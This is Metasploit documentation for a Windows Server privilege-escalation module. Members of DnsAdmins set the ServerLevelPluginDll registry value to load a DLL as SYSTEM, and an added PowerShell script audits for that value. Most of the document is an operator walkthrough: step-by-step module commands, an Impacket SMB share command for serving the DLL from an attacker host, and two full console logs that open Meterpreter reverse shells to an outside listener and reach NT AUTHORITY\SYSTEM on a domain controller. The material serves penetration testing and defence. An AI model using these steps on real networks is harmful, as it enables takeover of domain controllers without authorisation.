metasploit-gs/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md

Introduction

This module exploits a feature in the DNS service of Windows Server. Members of the DnsAdmins group can use dnscmd.exe to set the ServerLevelPluginDll registry value under HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\, and that value can be made to point to an arbitrary DLL. Once it is set, restarting the service loads the DLL and executes it, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become unresponsive, and it will require removing the registry value and rebooting to get the service working again.
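The following is an added defender-side audit script, not part of the Metasploit module or its documentation. It reads the ServerLevelPluginDll value described above, flags a UNC path or a DLL outside System32, lists DnsAdmins members, and greps the DNS Server event log for plugin-related messages; it assumes it runs as a local administrator on the DNS server and that the ActiveDirectory module is available for the group check. The -Remediate switch performs the recovery step the introduction mentions (clear the value, restart the service).

```powershell
<#
  Added example (not the module's code). Audits a Windows DNS server for the
  ServerLevelPluginDll value and reports who could have set it.
  Assumes local admin on the DNS server; the DnsAdmins lookup additionally
  assumes the ActiveDirectory module is installed. Omit -Remediate to only report.
#>
param([switch]$Remediate)

$key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$name = 'ServerLevelPluginDll'
$dll  = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name

if ([string]::IsNullOrWhiteSpace($dll)) {
    Write-Output "[OK] $name is not set on $env:COMPUTERNAME."
} else {
    Write-Output "[!] $name = $dll"
    # A UNC path means the DNS service (running as SYSTEM) loads the DLL from a remote share.
    if ($dll -match '^\\\\') {
        Write-Output "    UNC path: the DLL would be loaded from a network share."
    } elseif ($dll -notmatch ('^' + [regex]::Escape("$env:SystemRoot\System32\"))) {
        Write-Output "    DLL is outside System32 (e.g. a user's %TEMP%); treat as suspicious."
    }
    if (Test-Path -LiteralPath $dll) {
        $sig = Get-AuthenticodeSignature -FilePath $dll
        Write-Output ("    Authenticode status: {0}" -f $sig.Status)
    } else {
        Write-Output "    File not readable from here (missing, or the share is no longer reachable)."
    }
    if ($Remediate) {
        # Recovery described in the introduction: remove the value and restart DNS.
        Remove-ItemProperty -Path $key -Name $name
        Restart-Service -Name DNS -Force
        Write-Output "    Value removed and DNS service restarted; reboot if it stays unresponsive."
    }
}

# Who is able to set the value: DnsAdmins membership (a domain group on a DC).
if (Get-Command Get-ADGroupMember -ErrorAction SilentlyContinue) {
    $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty SamAccountName
    Write-Output "[*] DnsAdmins members: $($members -join ', ')"
}

# Recent DNS Server log entries mentioning the plugin DLL (message-text filter, no fixed event ID assumed).
Get-WinEvent -LogName 'DNS Server' -MaxEvents 500 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'ServerLevelPluginDll|plugin' } |
    Select-Object TimeCreated, Id, Message | Format-Table -AutoSize -Wrap
```

Run it on a schedule or from a configuration-management check; any non-empty ServerLevelPluginDll value on a server that does not intentionally use a DNS plugin should be treated as an incident.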

Vulnerable Application

Windows Server 2003 and above

Verification Steps

  1. Get a Meterpreter shell
  2. use exploit/windows/local/dnsadmin_serverlevelplugindll
  3. set PAYLOAD <payload>
  4. set LHOST <lhost>
  5. set LPORT <lport>
  6. set SESSION <session_no>
  7. set DLLNAME <dllname> if you want to name your DLL something other than msf.dll
  8. set DLLPATH <dllpath> if you want to place your DLL somewhere other than %TEMP% or want to use a UNC path
  9. exploit to get a SYSTEM shell

Options

DLLNAME Name of the DLL to use.

DLLPATH Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:

  1. A working SMB2 share (use Impacket's smbserver.py to quickly set one up)
  2. A DLL of the same architecture as the target system

Scenarios

Windows Server 2019 Standard x64, writing msf.dll to %TEMP%

PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 192.168.137.128
LPORT => 4444
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.137.128:4444 
msf5 exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:58249) at 2020-02-25 01:40:24 +0800

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:58249 (192.168.137.133)

msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Running check against DC01 as user BASILISKCORP\salazar...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
[+] User BASILISKCORP\salazar can start/stop the DNS service.
[*] Checking service state...
[*] DNS service is running, proceeding...
[*] Creating the payload DLL (x64)...
[*] Writing DLL to C:\Users\salazar\AppData\Local\Temp\msf.dll...
[*] Modifying ServerLevelPluginDll to point to C:\Users\salazar\AppData\Local\Temp\msf.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:58255) at 2020-02-25 01:40:49 +0800

meterpreter > sysinfo
Computer        : DC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : BASILISKCORP
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll

The fastest way to get a share up and running is to use Impacket's smbserver: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.128 test ./

PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 192.168.137.128
LPORT => 4444
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.137.128:4444 
msf5 exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.133:52968) at 2020-02-25 01:43:48 +0800
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar @ DC01  192.168.137.128:4444 -> 192.168.137.133:52968 (192.168.137.133)

msf5 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.128\\test
DLLPATH => \\192.168.137.128\test
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Running check against DC01 as user BASILISKCORP\salazar...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar is part of the DnsAdmins group.
[+] User BASILISKCORP\salazar can start/stop the DNS service.
[*] Checking service state...
[*] DNS service is running, proceeding...
[*] Using user-provided UNC path.
[*] Modifying ServerLevelPluginDll to point to \\192.168.137.128\test\test.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:52986) at 2020-02-25 01:46:06 +0800

meterpreter > sysinfo
Computer        : DC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : BASILISKCORP
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >